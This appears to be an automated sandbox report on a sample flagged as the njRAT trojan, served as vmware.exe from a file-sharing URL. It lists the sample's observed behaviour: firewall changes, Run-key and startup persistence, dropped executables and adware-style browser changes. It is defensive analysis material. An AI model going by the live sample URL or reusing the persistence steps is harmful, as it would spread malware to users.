Malware Analysis Report

2024-10-23 20:50

Sample ID 240623-1sa8eateng
Target https://temp.sh/WwJqO/vmware.exe
Tags
njrat windowsdefender discovery evasion persistence privilege_escalation spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://temp.sh/WwJqO/vmware.exe was found to be: Known bad.

Malicious Activity Summary

njrat windowsdefender discovery evasion persistence privilege_escalation spyware stealer trojan

njRAT/Bladabindi

Modifies Windows Firewall

Downloads MZ/PE file

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Modifies file permissions

Loads dropped DLL

Drops startup file

Looks up external IP address via web service

Checks installed software on the system

Enumerates connected drives

Adds Run key to start application

Blocklisted process makes network request

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Runs ping.exe

Enumerates system info in registry

Modifies Internet Explorer start page

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Modifies system certificate store

Modifies Internet Explorer Phishing Filter

Uses Volume Shadow Copy WMI provider

Modifies registry class

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-23 21:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-23 21:54

Reported

2024-06-23 21:57

Platform

win7-20240221-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

Signatures

njRAT/Bladabindi

trojan njrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9300538b8eb52046b545ea0eefc265d2.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9300538b8eb52046b545ea0eefc265d2.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7A211A2D-C79F-453E-9139-561FAC3D7E45\lite_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\12A0593A-69BF-4E3D-941E-7C00618D24D1\sender.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yb2B26.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
N/A N/A C:\Windows\TEMP\sdwra_5632_436080900\service_update.exe N/A
N/A N/A C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
N/A N/A C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
N/A N/A C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
N/A N/A C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
N/A N/A C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\9300538b8eb52046b545ea0eefc265d2 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\chrome_protect.exe\" .." C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\9300538b8eb52046b545ea0eefc265d2 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\chrome_protect.exe\" .." C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\YandexBrowserAutoLaunch_45886AE68CD319C7351FF54A1DBD4B87 = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --shutdown-if-not-closed-by-system-restart" C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Yandex\ui C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe C:\Windows\TEMP\sdwra_5632_436080900\service_update.exe N/A
File opened for modification C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe C:\Windows\TEMP\sdwra_5632_436080900\service_update.exe N/A
File opened for modification C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\debug.log C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIE8FD.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76bc31.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE59D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE33C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE68B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\System update for Yandex Browser.job C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
File opened for modification C:\Windows\Installer\MSIE202.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE30C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE63C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE7E4.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Update for Yandex Browser.job C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
File created C:\Windows\Tasks\Repairing Yandex Browser update service.job C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
File opened for modification C:\Windows\Installer\f76bc2e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE5ED.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE92D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76bc31.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Обновление Браузера Яндекс.job C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
File created C:\Windows\Installer\f76bc2e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE5CD.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A

Modifies Internet Explorer Phishing Filter

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 80131804b8c5da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\PhishingFilter C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName = "Яндекс" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "https://yandex.ru/search/?win=651&clid=6035498-354&text={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\DisplayName = "Bing" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MINIE\LinksBandEnabled = "1" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30e44514b8c5da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\SuggestionsURL C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\NTTopResultURL C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\TopResultURLFallback = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IE11TR" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\buffer C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\buffer\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\buffer\FaviconURLFallback = "http://www.bing.com/favicon.ico" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
